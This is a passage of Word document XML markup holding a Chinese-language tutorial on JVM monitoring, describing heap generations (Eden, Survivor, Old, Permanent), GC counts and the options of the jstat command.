          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="000F60D1" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4905955" cy="1064953"/>
            <wp:effectExtent l="19050" t="0" r="8945" b="0"/>
            <wp:docPr id="250" name="图片 3" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\U}RGV)2LJAMA3MT%R(9XVV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strator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\U}RGV)2LJAMA3MT%R(9XVVH.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4908611" cy="1065530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">E: Eden Space </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0.00%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>S0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>S1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Survior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区，都是空的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Old</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，老年代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Permanent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，永久代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>YGC(Young GC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>次，总耗时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>YGCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：耗时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00633228" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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最后要重点介绍下这个命令，这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>命令中比较重要，也是相当实用的一个命令，可以观察到</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>compiler</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>相关信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>具体参数如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-class</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>行为信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-compile</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计编译行为信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jdk gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gccapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计不同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>generations</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（不知道怎么翻译好，包括新生区，老年区，</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>permanent</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区）相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容量情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gccause</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
